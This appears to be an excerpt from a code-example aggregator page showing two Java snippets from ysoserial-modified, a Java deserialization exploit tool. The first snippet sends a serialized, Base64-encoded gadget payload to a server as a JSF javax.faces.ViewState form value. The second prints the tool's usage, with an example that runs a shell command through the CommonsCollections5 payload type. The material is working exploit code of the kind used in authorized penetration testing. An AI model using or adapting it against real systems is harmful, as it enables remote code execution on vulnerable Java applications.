        final HttpURLConnection http = (HttpURLConnection) rawConnection;
        http.setDoOutput(true);
        http.setRequestMethod("POST");
        http.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
        final OutputStream requestStream = http.getOutputStream();

        // Serialize into memory first so the bytes can be encoded as a form value.
        final ByteArrayOutputStream buffer = new ByteArrayOutputStream();
        final ObjectOutputStream objectOut = new ObjectOutputStream(buffer);
        objectOut.writeObject(payloadObject);
        objectOut.close();
        final byte[] serialized = buffer.toByteArray();
        final String encodedState = URLEncoder.encode(Base64.encodeBase64String(serialized), "US-ASCII");
        final String requestBody = "javax.faces.ViewState=" + encodedState;
        requestStream.write(requestBody.getBytes("US-ASCII"));
        requestStream.close();

        System.err.println("Have response code " + http.getResponseCode() + " " + http.getResponseMessage());
    }
    catch ( Exception e ) {
        e.printStackTrace(System.err);
    }
    Utils.releasePayload(payloadType, payloadObject);
}
 
Example #21
Source File: GeneratePayload.java    From ysoserial-modified with MIT License 5 votes vote down vote up
/**
 * Prints the banner, the usage line with an example invocation, and the list of available
 * payload types to stderr.
 *
 * <p>The payload classes come from {@code ObjectPayload.Utils.getPayloadClasses()} and are
 * sorted with {@code ToStringComparator}; each is printed as its simple name followed by the
 * list returned by {@code Dependencies.Utils.getDependencies}.
 */
private static void printUsage() {
    System.err.println("Y SO SERIAL?");
    System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] [terminal type: cmd / bash / powershell / none] '[command to execute]'");
    System.err.println("   ex: java -jar ysoserial-[version]-all.jar CommonsCollections5 bash 'touch /tmp/ysoserial'");
    System.err.println("\tAvailable payload types:");

    final List<Class<? extends ObjectPayload>> sortedPayloads =
        new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
    Collections.sort(sortedPayloads, new ToStringComparator()); // alphabetical order

    for (Class<? extends ObjectPayload> payloadClass : sortedPayloads) {
        final String name = payloadClass.getSimpleName();
        final List<?> dependencies = Arrays.asList(Dependencies.Utils.getDependencies(payloadClass));
        System.err.println("\t\t" + name + " " + dependencies);
    }
}